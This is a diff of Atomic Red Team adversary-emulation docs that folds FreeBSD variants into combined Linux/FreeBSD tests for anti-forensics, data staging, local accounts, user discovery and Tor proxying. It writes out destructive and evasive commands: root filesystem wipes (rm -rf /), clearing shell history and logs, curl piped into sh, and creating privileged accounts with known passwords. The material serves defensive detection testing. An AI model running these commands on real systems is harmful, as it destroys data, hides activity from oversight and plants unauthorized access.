 **Supported Platforms:** Linux
@@ -487,7 +326,7 @@ sshpass -p 'pwd101!' ssh testuser1@localhost -T hostname
 
 #### Cleanup Commands:
 ```sh
-userdel -f testuser1
+[ "$(uname)" = 'FreeBSD' ] && rmuser -y testuser1 || userdel -f testuser1
 ```
 
 
@@ -500,9 +339,9 @@ $(getent passwd testuser1 >/dev/null) && $(which sshpass >/dev/null)
 ```
 ##### Get Prereq Commands:
 ```sh
-/usr/sbin/useradd testuser1
-echo -e 'pwd101!\npwd101!' | passwd testuser1
-(which yum && yum -y install epel-release sshpass)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y sshpass)
+[ "$(uname)" = 'FreeBSD' ] && pw useradd testuser1 -g wheel -s /bin/sh || /usr/sbin/useradd testuser1
+[ "$(uname)" = 'FreeBSD' ] && echo 'pwd101!' | pw mod user testuser1 -h 0 || echo -e 'pwd101!\npwd101!' | passwd testuser1
+(which yum && yum -y install epel-release sshpass)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y sshpass)||(which pkg && pkg install -y sshpass)
 ```
 
 
@@ -511,53 +350,7 @@ echo -e 'pwd101!\npwd101!' | passwd testuser1
 <br/>
 <br/>
 
-## Atomic Test #16 - Disable sh History Logging with SSH -T (freebsd)
-Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** ec3f2306-dd19-4c4b-bed7-92d20e9b1dee
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-sshpass -p 'pwd101!' ssh testuser1@localhost -T hostname
-```
-
-#### Cleanup Commands:
-```sh
-rmuser -y testuser1
-```
-
-
-
-#### Dependencies:  Run with `sh`!
-##### Description: Install sshpass and create user account used for excuting
-##### Check Prereq Commands:
-```sh
-$(getent passwd testuser1 >/dev/null) && $(which sshpass >/dev/null)
-```
-##### Get Prereq Commands:
-```sh
-pw useradd testuser1 -g wheel -s /bin/sh
-echo 'pwd101!' | pw mod user testuser1 -h 0
-(which pkg && pkg install -y sshpass)
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #17 - Prevent Powershell History Logging
+## Atomic Test #10 - Prevent Powershell History Logging
 Prevents Powershell history
 
 **Supported Platforms:** Windows
@@ -589,7 +382,7 @@ Set-PSReadLineOption -HistorySaveStyle SaveIncrementally
 <br/>
 <br/>
 
-## Atomic Test #18 - Clear Powershell History by Deleting History File
+## Atomic Test #11 - Clear Powershell History by Deleting History File
 Clears Powershell history
 
 **Supported Platforms:** Windows
@@ -617,7 +410,7 @@ Remove-Item (Get-PSReadlineOption).HistorySavePath
 <br/>
 <br/>
 
-## Atomic Test #19 - Set Custom AddToHistoryHandler to Avoid History File Logging
+## Atomic Test #12 - Set Custom AddToHistoryHandler to Avoid History File Logging
 The "AddToHistoryHandler" receives the current command as the $line variable and then returns $true if 
 the line should be written to the history file. Here we simply return $false so nothing gets added to 
 the history file for the current session.

atomics/T1070.004/T1070.004.md

@@ -22,11 +22,9 @@ There are tools available from the host operating system to perform cleanup, but
 
 - [Atomic Test #8 - Delete Filesystem - Linux](#atomic-test-8---delete-filesystem---linux)
 
-- [Atomic Test #9 - Delete Filesystem - FreeBSD](#atomic-test-9---delete-filesystem---freebsd)
+- [Atomic Test #9 - Delete Prefetch File](#atomic-test-9---delete-prefetch-file)
 
-- [Atomic Test #10 - Delete Prefetch File](#atomic-test-10---delete-prefetch-file)
-
-- [Atomic Test #11 - Delete TeamViewer Log Files](#atomic-test-11---delete-teamviewer-log-files)
+- [Atomic Test #10 - Delete TeamViewer Log Files](#atomic-test-10---delete-teamviewer-log-files)
 
 
 <br/>
@@ -354,40 +352,11 @@ This test deletes the entire root filesystem of a Linux system. This technique w
 
 
 
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-rm -rf / --no-preserve-root > /dev/null 2> /dev/null
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #9 - Delete Filesystem - FreeBSD
-This test deletes the entire root filesystem of a FreeBSD system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** b5aaca7e-a48f-4f1b-8f0f-a27b8f516608
-
-
-
-
-
-
 #### Attack Commands: Run with `sh`! 
 
 
 ```sh
-chflags -R 0 /
-rm -rf / > /dev/null 2> /dev/null
+[ "$(uname)" = 'Linux' ] && rm -rf / --no-preserve-root > /dev/null 2> /dev/null || chflags -R 0 / && rm -rf / > /dev/null 2> /dev/null
 ```
 
 
@@ -398,7 +367,7 @@ rm -rf / > /dev/null 2> /dev/null
 <br/>
 <br/>
 
-## Atomic Test #10 - Delete Prefetch File
+## Atomic Test #9 - Delete Prefetch File
 Delete a single prefetch file.  Deletion of prefetch files is a known anti-forensic technique. To verify execution, Run "(Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" | Measure-Object).Count"
 before and after the test to verify that the number of prefetch files decreases by 1.
 
@@ -427,7 +396,7 @@ Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$
 <br/>
 <br/>
 
-## Atomic Test #11 - Delete TeamViewer Log Files
+## Atomic Test #10 - Delete TeamViewer Log Files
 Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ration.
 This test just places the files in a non-TeamViewer folder, a detection would just check for a deletion event matching the TeamViewer
 log file format of TeamViewer_##.log. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.

atomics/T1074.001/T1074.001.md

@@ -10,9 +10,7 @@ Adversaries may also stage collected data in various available formats/locations
 
 - [Atomic Test #2 - Stage data from Discovery.sh](#atomic-test-2---stage-data-from-discoverysh)
 
-- [Atomic Test #3 - Stage data from Discovery.sh (freebsd)](#atomic-test-3---stage-data-from-discoverysh-freebsd)
-
-- [Atomic Test #4 - Zip a Folder with PowerShell for Staging in Temp](#atomic-test-4---zip-a-folder-with-powershell-for-staging-in-temp)
+- [Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp](#atomic-test-3---zip-a-folder-with-powershell-for-staging-in-temp)
 
 
 <br/>
@@ -67,39 +65,6 @@ Utilize curl to download discovery.sh and execute a basic information gathering
 
 
 
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| output_file | Location to save downloaded discovery.bat file | path | /tmp/T1074.001_discovery.log|
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > #{output_file}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Stage data from Discovery.sh (freebsd)
-Utilize curl to download discovery.sh and execute a basic information gathering shell script
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** 4fca7b49-379d-4493-8890-d6297750fa46
-
-
-
-
-
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
@@ -113,18 +78,22 @@ Utilize curl to download discovery.sh and execute a basic information gathering
 curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | sh -s > #{output_file}
 ```
 
+#### Cleanup Commands:
+```sh
+rm #{output_file}
+```
 
 
 
 #### Dependencies:  Run with `sh`!
-##### Description: Check if curl is installed.
+##### Description: Check if curl is installed on the machine.
 ##### Check Prereq Commands:
 ```sh
-if [ ! -x "$(command -v curl)" ]; then exit 1; else exit 0; fi;
+if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
 ```
 ##### Get Prereq Commands:
 ```sh
-(which pkg && pkg install -y curl)
+which apt && apt update && apt install -y curl || which pkg && pkg update && pkg install -y curl
 ```
 
 
@@ -133,7 +102,7 @@ if [ ! -x "$(command -v curl)" ]; then exit 1; else exit 0; fi;
 <br/>
 <br/>
 
-## Atomic Test #4 - Zip a Folder with PowerShell for Staging in Temp
+## Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp
 Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip
 was placed in the temp directory.
 

atomics/T1078.003/T1078.003.md

@@ -22,15 +22,13 @@ Local Accounts may also be abused to elevate privileges and harvest credentials
 
 - [Atomic Test #8 - Create local account (Linux)](#atomic-test-8---create-local-account-linux)
 
-- [Atomic Test #9 - Create local account (FreeBSD)](#atomic-test-9---create-local-account-freebsd)
+- [Atomic Test #9 - Reactivate a locked/expired account (Linux)](#atomic-test-9---reactivate-a-lockedexpired-account-linux)
 
-- [Atomic Test #10 - Reactivate a locked/expired account (Linux)](#atomic-test-10---reactivate-a-lockedexpired-account-linux)
+- [Atomic Test #10 - Reactivate a locked/expired account (FreeBSD)](#atomic-test-10---reactivate-a-lockedexpired-account-freebsd)
 
-- [Atomic Test #11 - Reactivate a locked/expired account (FreeBSD)](#atomic-test-11---reactivate-a-lockedexpired-account-freebsd)
+- [Atomic Test #11 - Login as nobody (Linux)](#atomic-test-11---login-as-nobody-linux)
 
-- [Atomic Test #12 - Login as nobody (Linux)](#atomic-test-12---login-as-nobody-linux)
-
-- [Atomic Test #13 - Login as nobody (freebsd)](#atomic-test-13---login-as-nobody-freebsd)
+- [Atomic Test #12 - Login as nobody (freebsd)](#atomic-test-12---login-as-nobody-freebsd)
 
 
 <br/>
@@ -289,15 +287,14 @@ An adversary may wish to create an account with admin privileges to work with. I
 
 
 ```bash
-useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
-su art
-whoami
-exit
+password=$(openssl passwd -1 art)
+([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0))
+su art -c "whoami; exit"
 ```
 
 #### Cleanup Commands:
 ```bash
-userdel -r art
+[ "$(uname)" = 'Linux' ] && userdel art -rf || rmuser -y art
 ```
 
 
@@ -307,43 +304,7 @@ userdel -r art
 <br/>
 <br/>
 
-## Atomic Test #9 - Create local account (FreeBSD)
-An adversary may wish to create an account with admin privileges to work with. In this test we create a "art" user with the password art, switch to art, execute whoami, exit and delete the art user.
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** 95158cc9-8f6d-4889-9531-9be3f7f095e0
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
-
-```sh
-pw useradd art -g wheel -s /bin/sh
-echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0      
-su art
-whoami
-exit
-```
-
-#### Cleanup Commands:
-```sh
-rmuser -y art
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #10 - Reactivate a locked/expired account (Linux)
+## Atomic Test #9 - Reactivate a locked/expired account (Linux)
 A system administrator may have locked and expired a user account rather than deleting it. "the user is coming back, at some stage" An adversary may reactivate a inactive account in an attempt to appear legitimate. 
 
 In this test we create a "art" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.
@@ -384,7 +345,7 @@ userdel -r art
 <br/>
 <br/>
 
-## Atomic Test #11 - Reactivate a locked/expired account (FreeBSD)
+## Atomic Test #10 - Reactivate a locked/expired account (FreeBSD)
 A system administrator may have locked and expired a user account rather than deleting it. "the user is coming back, at some stage" An adversary may reactivate a inactive account in an attempt to appear legitimate. 
 
 In this test we create a "art" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.
@@ -426,7 +387,7 @@ rmuser -y art
 <br/>
 <br/>
 
-## Atomic Test #12 - Login as nobody (Linux)
+## Atomic Test #11 - Login as nobody (Linux)
 An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin.
 
 **Supported Platforms:** Linux
@@ -466,7 +427,7 @@ cat /etc/passwd |grep nobody
 <br/>
 <br/>
 
-## Atomic Test #13 - Login as nobody (freebsd)
+## Atomic Test #12 - Login as nobody (freebsd)
 An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin.
 
 **Supported Platforms:** Linux

atomics/T1087.001/T1087.001.md

@@ -16,17 +16,15 @@ Commands such as <code>net user</code> and <code>net localgroup</code> of the [N
 
 - [Atomic Test #5 - Show if a user account has ever logged in remotely](#atomic-test-5---show-if-a-user-account-has-ever-logged-in-remotely)
 
-- [Atomic Test #6 - Show if a user account has ever logged in remotely (freebsd)](#atomic-test-6---show-if-a-user-account-has-ever-logged-in-remotely-freebsd)
+- [Atomic Test #6 - Enumerate users and groups](#atomic-test-6---enumerate-users-and-groups)
 
 - [Atomic Test #7 - Enumerate users and groups](#atomic-test-7---enumerate-users-and-groups)
 
-- [Atomic Test #8 - Enumerate users and groups](#atomic-test-8---enumerate-users-and-groups)
+- [Atomic Test #8 - Enumerate all accounts on Windows (Local)](#atomic-test-8---enumerate-all-accounts-on-windows-local)
 
-- [Atomic Test #9 - Enumerate all accounts on Windows (Local)](#atomic-test-9---enumerate-all-accounts-on-windows-local)
+- [Atomic Test #9 - Enumerate all accounts via PowerShell (Local)](#atomic-test-9---enumerate-all-accounts-via-powershell-local)
 
-- [Atomic Test #10 - Enumerate all accounts via PowerShell (Local)](#atomic-test-10---enumerate-all-accounts-via-powershell-local)
-
-- [Atomic Test #11 - Enumerate logged on users via CMD (Local)](#atomic-test-11---enumerate-logged-on-users-via-cmd-local)
+- [Atomic Test #10 - Enumerate logged on users via CMD (Local)](#atomic-test-10---enumerate-logged-on-users-via-cmd-local)
 
 
 <br/>
@@ -209,7 +207,8 @@ Show if a user account has ever logged in remotely
 
 
 ```sh
-lastlog > #{output_file}
+[ "$(uname)" = 'FreeBSD' ] && cmd="lastlogin" || cmd="lastlog" 
+$cmd > #{output_file}
 cat #{output_file}
 ```
 
@@ -237,45 +236,7 @@ sudo apt-get install login; exit 1;
 <br/>
 <br/>
 
-## Atomic Test #6 - Show if a user account has ever logged in remotely (freebsd)
-Show if a user account has ever logged in remotely
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** 0f73418f-d680-4383-8a24-87bc97fe4e35
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| output_file | Path where captured results will be placed | path | /tmp/T1087.001.txt|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-lastlogin > #{output_file}
-cat #{output_file}
-```
-
-#### Cleanup Commands:
-```sh
-rm -f #{output_file}
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - Enumerate users and groups
+## Atomic Test #6 - Enumerate users and groups
 Utilize groups and id to enumerate users and groups
 
 **Supported Platforms:** Linux, macOS
@@ -304,7 +265,7 @@ id
 <br/>
 <br/>
 
-## Atomic Test #8 - Enumerate users and groups
+## Atomic Test #7 - Enumerate users and groups
 Utilize local utilities to enumerate users and groups
 
 **Supported Platforms:** macOS
@@ -336,7 +297,7 @@ dscacheutil -q user
 <br/>
 <br/>
 
-## Atomic Test #9 - Enumerate all accounts on Windows (Local)
+## Atomic Test #8 - Enumerate all accounts on Windows (Local)
 Enumerate all accounts
 Upon execution, multiple enumeration commands will be run and their output displayed in the PowerShell session
 
@@ -369,7 +330,7 @@ net localgroup
 <br/>
 <br/>
 
-## Atomic Test #10 - Enumerate all accounts via PowerShell (Local)
+## Atomic Test #9 - Enumerate all accounts via PowerShell (Local)
 Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.
 
 **Supported Platforms:** Windows
@@ -405,7 +366,7 @@ net localgroup
 <br/>
 <br/>
 
-## Atomic Test #11 - Enumerate logged on users via CMD (Local)
+## Atomic Test #10 - Enumerate logged on users via CMD (Local)
 Enumerate logged on users. Upon execution, logged on users will be displayed.
 
 **Supported Platforms:** Windows

atomics/T1090.003/T1090.003.md

@@ -10,12 +10,10 @@ In the case of network infrastructure, particularly routers, it is possible for
 
 - [Atomic Test #2 - Tor Proxy Usage - Windows](#atomic-test-2---tor-proxy-usage---windows)
 
-- [Atomic Test #3 - Tor Proxy Usage - Debian/Ubuntu](#atomic-test-3---tor-proxy-usage---debianubuntu)
+- [Atomic Test #3 - Tor Proxy Usage - Debian/Ubuntu/FreeBSD](#atomic-test-3---tor-proxy-usage---debianubuntufreebsd)
 
 - [Atomic Test #4 - Tor Proxy Usage - MacOS](#atomic-test-4---tor-proxy-usage---macos)
 
-- [Atomic Test #5 - Tor Proxy Usage - FreeBSD](#atomic-test-5---tor-proxy-usage---freebsd)
-
 
 <br/>
 
@@ -142,7 +140,7 @@ expand-archive -LiteralPath "PathToAtomicsFolder\..\ExternalPayloads\tor.zip" -D
 <br/>
 <br/>
 
-## Atomic Test #3 - Tor Proxy Usage - Debian/Ubuntu
+## Atomic Test #3 - Tor Proxy Usage - Debian/Ubuntu/FreeBSD
 This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.
 Upon successful execution, the tor proxy service will be launched.
 
@@ -160,12 +158,12 @@ Upon successful execution, the tor proxy service will be launched.
 
 
 ```sh
-sudo systemctl start tor
+[ "$(uname)" = 'FreeBSD' ] && sysrc tor_enable="YES" && service tor start || sudo systemctl start tor
 ```
 
 #### Cleanup Commands:
 ```sh
-sudo systemctl stop tor
+[ "$(uname)" = 'FreeBSD' ] && service tor stop && sysrc -x tor_enable || sudo systemctl stop tor
 ```
 
 
@@ -178,7 +176,7 @@ if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi
 ```
 ##### Get Prereq Commands:
 ```sh
-sudo apt-get -y install tor
+(which apt && sudo apt-get -y install tor) || (which pkg && pkg install -y tor)
 ```
 
 
@@ -230,51 +228,4 @@ brew install tor
 
 
 
-<br/>
-<br/>
-
-## Atomic Test #5 - Tor Proxy Usage - FreeBSD
-This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.
-Upon successful execution, the tor proxy service will be launched.
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** 550ec67d-a99e-408b-816a-689271b27d2a
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
-
-```sh
-sysrc tor_enable="YES"
-service tor start
-```
-
-#### Cleanup Commands:
-```sh
-service tor stop
-sysrc -x tor_enable
-```
-
-
-
-#### Dependencies:  Run with `sh`!
-##### Description: Tor must be installed on the machine
-##### Check Prereq Commands:
-```sh
-if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi
-```
-##### Get Prereq Commands:
-```sh
-pkg install -y tor
-```
-
-
-
-
 <br/>